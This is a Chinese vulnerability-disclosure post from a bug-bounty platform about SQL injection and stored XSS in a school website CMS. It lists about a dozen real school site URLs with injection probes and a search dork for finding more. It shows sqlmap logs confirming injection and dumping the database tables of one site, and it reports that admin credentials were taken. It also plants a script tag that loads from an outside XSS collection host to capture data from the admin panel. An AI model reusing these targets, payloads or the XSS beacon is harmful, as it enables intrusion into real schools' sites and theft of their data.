2014-07-14: 细节已通知厂商并且等待厂商处理中 2014-07-19: 厂商已经确认,细节仅向厂商公开 2014-07-22: 细节向第三方安全合作伙伴开放 2014-09-12: 细节向核心白帽子及相关领域专家公开 2014-09-22: 细节向普通白帽子公开 2014-10-02: 细节向实习白帽子公开 2014-10-12: 细节向公众公开
哎呀妈啊。。小伙伴是不是会想我了呢?这么久没有提交漏洞了呢。。好吧。。这次再来提交SQL注入漏洞试试吧、、、嘿嘿。狗哥走个大厂商呗、。。。这个只是前瞻。正在进一步深入研究getshell
"校无忧学校网站系统"
这个是关键字喔,可以加""这个。也可以不加!百度搜索到
.....。。。。。。好了。。以上就是综合到的一些信息吧。。呵呵。。然后我就,收集了几个网站!以下网站仅供国家互联网应急中心测试:
http://58.54.134.248/TeachView.asp?id=21%27http://www.dcqdssyxx.com/TeachView.asp?id=22%27http://www.zcvc.cn/dgb/StudentView.asp?id=13%27http://www.tajx.com/TeacherView.asp?id=12%27http://118.112.184.98:90/NewsView.asp?id=35%27http://www.tajx.com/Newsview.asp?id=20%27http://www.yjsdszx.com/NewsView.asp?id=31%27http://www.zhwdxx.com/NewsView.asp?id=11%27http://www.sxtjxx.net/TeachView.asp?id=13%27http://www.yrenedu.com/MoralsView.asp?id=21%27http://www.sxtjxx.net/Newsview.asp?id=29%27
而且EDU也被XXOO过了。。
好啦。。先这样子吧。。。都存在get注入?
[root@Hacker~]# Sqlmap sqlmap -u "http://www.tajx.com/TeacherView.asp?id=12" sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicablelocal, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 20:18:40[20:18:40] [INFO] testing connection to the target url[20:18:41] [INFO] testing if the url is stable, wait a few seconds[20:18:43] [WARNING] url is not stable, sqlmap will base the page comparison ona sequence matcher. If no dynamic nor injectable parameters are detected, or incase of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match onhow do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit][20:18:46] [INFO] testing if GET parameter 'id' is dynamic[20:18:46] [INFO] confirming that GET parameter 'id' is dynamic[20:18:47] [WARNING] GET parameter 'id' appears to be not dynamic[20:18:47] [INFO] heuristics detected web page charset 'GB2312'[20:18:47] [WARNING] reflective value(s) found and filtering out[20:18:47] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: Microsoft Access)[20:18:47] [INFO] testing for SQL injection on GET parameter 'id'[20:18:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[20:18:49] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectableparsed error message(s) showed that the back-end DBMS could be Microsoft Access. Do you want to skip test payloads specific for other DBMSes? [Y/n][20:18:52] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'[20:18:52] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found[20:19:22] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[20:19:33] [INFO] checking if the injection point on GET parameter 'id' is a false positiveGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]sqlmap identified the following injection points with a total of 30 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=12 AND 5910=5910---[20:20:11] [INFO] testing Microsoft Access[20:20:12] [INFO] confirming Microsoft Access[20:20:13] [INFO] the back-end DBMS is Microsoft Accessweb server operating system: Windows 2003web application technology: Microsoft IIS 6.0, ASPback-end DBMS: Microsoft Access[20:20:13] [WARNING] HTTP error codes detected during testing:500 (Internal Server Error) - 30 times[20:20:13] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.[20:20:13] [INFO] fetched data logged to text files under 'D:\??\???~1\tools\????\SQLMAP~3\Bin\output\www.tajx.com'[*] shutting down at 20:20:13
用阿D查看到了账号密码后进入后台。。准备进行深一步研究!然后在前台看见了个
写入XSS代码:
<script src="http://xss.esotsec.org/?u=57a23e" > </script>
然后在后台点击查看
虽然显示空白
但是XSS测试平台已经收到信息了
[20:51:48] [INFO] tried 1184/3144 items (38%)[20:52:09] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[20:52:22] [INFO] tried 1201/3144 items (38%)[20:52:43] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[20:53:09] [INFO] retrieved: school[20:53:45] [INFO] tried 1268/3144 items (40%)[20:54:06] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[20:55:37] [INFO] tried 1365/3144 items (43%)[20:55:58] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[20:56:14] [INFO] tried 1383/3144 items (44%)[20:56:35] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[20:56:55] [INFO] tried 1403/3144 items (45%)[20:57:16] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[20:57:33] [INFO] tried 1426/3144 items (45%)[20:57:54] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[20:58:11] [INFO] tried 1461/3144 items (46%)[20:58:32] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[20:58:38] [INFO] tried 1469/3144 items (47%)[20:58:59] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[20:59:58] [INFO] tried 1541/3144 items (49%)[21:00:19] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:00:37] [INFO] tried 1566/3144 items (50%)[21:00:58] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:01:09] [INFO] tried 1570/3144 items (50%)[21:01:30] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:01:43] [INFO] tried 1587/3144 items (50%)[21:02:04] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:02:31] [INFO] tried 1629/3144 items (52%)[21:02:52] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:02:57] [INFO] tried 1639/3144 items (52%)[21:03:18] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:03:22] [INFO] tried 1648/3144 items (52%)[21:03:43] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:04:10] [INFO] tried 1690/3144 items (54%)[21:04:31] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:04:55] [INFO] tried 1729/3144 items (55%)[21:05:15] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:05:19] [INFO] tried 1736/3144 items (55%)[21:05:40] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:05:50] [INFO] tried 1755/3144 items (56%)[21:06:11] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:07:40] [INFO] tried 1836/3144 items (58%)[21:08:01] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:08:28] [INFO] tried 1879/3144 items (60%)[21:08:49] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:08:52] [INFO] tried 1882/3144 items (60%)[21:09:12] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:10:37] [INFO] tried 1962/3144 items (62%)[21:10:58] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:11:10] [INFO] tried 1984/3144 items (63%)[21:11:31] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:11:43] [INFO] tried 1997/3144 items (64%)[21:12:04] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:12:37] [INFO] tried 2032/3144 items (65%)[21:12:58] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:13:14] [INFO] tried 2050/3144 items (65%)[21:13:35] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:13:48] [INFO] tried 2067/3144 items (66%)[21:14:09] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:14:19] [INFO] tried 2084/3144 items (66%)[21:14:40] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:14:52] [INFO] tried 2098/3144 items (67%)[21:15:12] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:15:21] [INFO] tried 2121/3144 items (67%)[21:15:42] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:16:25] [INFO] tried 2157/3144 items (69%)[21:16:46] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:17:14] [INFO] tried 2189/3144 items (70%)[21:17:34] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:18:02] [INFO] tried 2198/3144 items (70%)[21:18:23] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:18:42] [INFO] tried 2223/3144 items (71%)[21:19:03] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:19:12] [INFO] tried 2237/3144 items (71%)[21:19:33] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:19:48] [INFO] tried 2262/3144 items (72%)[21:20:09] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:20:18] [INFO] tried 2277/3144 items (72%)[21:20:39] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:20:51] [INFO] tried 2301/3144 items (73%)[21:21:12] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:21:40] [INFO] tried 2334/3144 items (74%)[21:22:01] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:22:24] [INFO] tried 2363/3144 items (75%)[21:22:45] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:23:23] [INFO] tried 2404/3144 items (76%)[21:23:44] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:24:02] [INFO] tried 2435/3144 items (77%)[21:24:32] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request[21:24:50] [INFO] tried 2459/3144 items (78%)[21:25:11] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:25:33] [INFO] tried 2495/3144 items (79%)[21:25:54] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:26:07] [INFO] tried 2503/3144 items (80%)[21:26:28] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:26:58] [INFO] tried 2538/3144 items (81%)[21:27:19] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:27:42] [INFO] tried 2565/3144 items (82%)[21:28:03] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:28:23] [INFO] tried 2579/3144 items (82%)[21:28:44] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:29:14] [INFO] tried 2619/3144 items (83%)[21:29:35] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:30:05] [INFO] tried 2642/3144 items (84%)[21:30:26] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:30:37] [INFO] tried 2654/3144 items (84%)[21:30:58] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:31:04] [INFO] tried 2670/3144 items (85%)[21:31:25] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:31:51] [INFO] tried 2705/3144 items (86%)[21:32:12] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:32:41] [INFO] tried 2727/3144 items (87%)[21:33:02] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:33:09] [INFO] tried 2737/3144 items (87%)[21:33:30] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:33:40] [INFO] tried 2753/3144 items (88%)[21:34:01] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:34:19] [INFO] tried 2774/3144 items (88%)[21:34:40] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:35:02] [INFO] tried 2802/3144 items (89%)[21:35:23] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:35:34] [INFO] tried 2822/3144 items (90%)[21:36:04] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request[21:36:19] [INFO] tried 2845/3144 items (90%)[21:36:40] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:37:11] [INFO] tried 2869/3144 items (91%)[21:37:31] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:37:40] [INFO] tried 2891/3144 items (92%)[21:38:01] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:38:27] [INFO] tried 2920/3144 items (93%)[21:38:48] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:39:11] [INFO] tried 2950/3144 items (94%)[21:39:32] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:39:35] [INFO] tried 2955/3144 items (94%)[21:39:56] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:40:53] [INFO] tried 3006/3144 items (96%)[21:41:14] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:41:27] [INFO] tried 3025/3144 items (96%)[21:41:48] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:42:10] [INFO] tried 3050/3144 items (97%)[21:42:31] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:42:44] [INFO] tried 3059/3144 items (97%)[21:43:05] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:43:30] [INFO] tried 3104/3144 items (99%)[21:43:51] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:44:14] [INFO] tried 3133/3144 items (100%)[21:44:35] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the requestDatabase: Microsoft_Access_masterdb[6 tables]+----------+| admin || feedback || menu || news || school || student |+----------+[21:44:46] [WARNING] HTTP error codes detected during testing:500 (Internal Server Error) - 3142 times[21:44:46] [INFO] fetched data logged to text files under 'D:\??\???~1\tools\????\SQLMAP~3\Bin\output\www.tajx.com'[*] shutting down at 21:44:46
准备深一步研究哈!给我多点rank最好加精或来个证书。。哈哈
危害等级:高
漏洞Rank:16
确认时间:2014-07-19 11:41
暂无
咦????
你关注的白帽子 泳少 发表了漏洞 某学校管理系统漏洞大礼包集合(含XSS存储-SQL注入漏洞)
@光刃 咋了?
@zhxs 这个。。。唉。。伤心。。不是前台